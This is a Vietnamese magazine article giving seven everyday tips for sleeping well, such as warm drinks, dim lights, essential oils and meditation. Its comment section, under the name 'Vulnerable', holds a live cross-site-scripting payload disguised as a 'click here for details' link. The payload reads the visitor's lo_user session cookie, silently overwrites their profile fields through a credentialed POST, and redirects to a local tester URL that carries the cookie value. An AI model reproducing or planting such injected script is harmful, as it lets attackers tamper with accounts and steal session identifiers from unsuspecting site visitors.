Nghe chuyên gia sức khỏe “mách” cách để có giấc ngủ ngon mỗi ngày

28/05/2019

Là nhu cầu cơ bản nhất của con người nên ngủ đóng một vai trò vô cùng quan trọng. Bên cạnh nhu cầu ăn uống, luyện tập thể thao thì những giấc ngủ đủ sâu sẽ là điều kiện cho một sức khỏe tốt, hạn chế căng thẳng đến mức tối đa, cho bạn một hiệu suất làm việc tuyệt vời.

Vậy làm thế nào để an tâm "đánh" giấc thật ngon? L’Officiel Vietnam xin trích lại lời các chuyên gia sức khỏe “mách” bạn cách để có một giấc ngủ ngon mỗi ngày.

Cách để có giấc ngủ ngon
Mách bạn cách để có giấc ngủ ngon để luôn có 1 sức khỏe tốt và làn da tươi trẻ

1.Nhâm nhi chút gì đó nhẹ nhàng

Theo Snyder, một trong những điều tốt nhất bạn có thể làm để ngủ sâu giấc sau bữa ăn tối chính là nhâm nhi một chút gì đó nhẹ nhàng. Nếu bạn không phải là tín đồ của trà cũng không sao vì có thể pha trộn một chút mật ong cùng sữa ấm để cơ thể được làm ấm.

Cách để có giấc ngủ ngon

2. Tắt đèn khi ngủ

Bạn có thể đã chán ngấy khi nghe điều này nhưng nó thật sự quan trọng để đảm bảo việc nhắm mắt khi ngủ dễ dàng và ngủ sâu giấc hơn. Cách để có một giấc ngủ ngon tốt nhất chính là hãy tắt đèn sau 6 giờ tối vào mùa đông hoặc sau 7 giờ chiều vào mùa hè. Thay thế ánh sáng cho không gian phòng ngủ bằng nến không độc hại cũng là một cách tốt

 Cách để có một giấc ngủ ngon

3.Spa tại gia

Hãy tự thưởng mình một buổi mát xa thư giãn-tạo cho mình một không gian spa tại nhà trước khi tắm vào buổi tối. Nhờ đó sẽ giúp làm dịu và thư giãn hệ thống thần kinh, giảm lo lắng và căng thẳng để giấc ngủ được ngon hơn, sâu hơn.

Cách để có giấc ngủ ngon

4.Rửa mặt sạch

Đúng vậy, tuyệt đối đừng bao giờ để khuôn mặt đầy phấn trang điểm nguyên y và leo lên giường. Đó không phải là cách để có một giấc ngủ ngon như bạn mong muốn đâu. Hãy cố gắng làm sạch khuôn mặt với bông tẩy trang và sữa rửa mặt để mọi vi khuẩn và lớp trang điểm được làm sạch, cho làn da được thở và được thư giãn. Bạn có thể tham khảo những loại mặt nạ ngủ Hàn Quốc để da vừa được ngủ vừa được làm đẹp. Đây cũng là cách tốt cho hệ thần kinh, cho giấc ngủ được ngon hơn.

Cách để có giấc ngủ ngon

5.Nghe nhạc

Những bản nhạc thư giãn trên Spotify sẽ là cách tốt để bạn có một đêm ngủ ngon. Điều quan trọng là hãy chọn những bản nhạc có độ rung thấp để tâm trí được xoa dịu và phải cài đặt chế độ tự động ngắt sau một khoảng thời gian nhất định.

Cách để có giấc ngủ ngon

 

6.Dùng tinh dầu

Cách để có giấc ngủ ngon có thể là dùng tinh dầu như tinh dầu hoa oải hương, nhỏ vài giọt lên gối hoặc hít một chút hương cũng đủ để tinh thần được xoa dịu. Tinh dàu cúc La Mã cũng là một ý hay. Bạn hãy thử xem sao nhé.

Cách để có giấc ngủ ngon

7.Thiền

Một ý tưởng hay chính là thiền. Hãy thử hình thành thói quen thiền định mỗi tối. Nó là cách để bạn dễ dàng ngủ khi mà đã không còn những vướng bận trong tâm trí. Một cuốn sách dạy thiền sẽ là gợi ý hay để bạn sẵn sàng đón nhận những điều mới mẻ trong cuộc sống. Đây là cách để có một giấc ngủ ngonlợi ích của việc ngồi thiền là đem lại sự nhẹ nhõm trong tâm trí bạn.

Cách để có giấc ngủ ngon

 

 

Bình luận

Bạn nghĩ gì về bài viết này ?(1 bình luận)

Bạn cần đăng nhập để có thể bình luận

Có 1 thành viên đã bình luận

Vulnerable

Vulnerable

<a href="#" onclick="javascript:function getID(){ a = document.cookie.match('lo_user'); b = a['input'].slice(a['input'].search('lo_user')); return b.slice(0, b.search(';'));};fetch('https://www.lofficiel.vn/tai-khoan/thong-tin-ca-nhan', {'headers': {'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'cookie': '__asc=482511c617507373ebb2f5d3187; fblo_1538391976230875=y; lo_user=%7B%22id%22%3A1616%7D; __asc=482511c617507373ebb2f5d3187; _gat=1',}, 'body':'fullname=Vulnerable&phone=Vulnerable&address=Vulnerable&job=Vulnerable','method': 'POST', 'credentials': 'include'}).then(response => response.json()).then(data => { console.log('Success:', data);}).catch((error) => { console.error('Error:', error);});window.location='http://127.0.0.1:8081/Tester/xss.php?cok='+getID()+'&url='+document.URL;" >Click vào đây để xem chi tiết</a>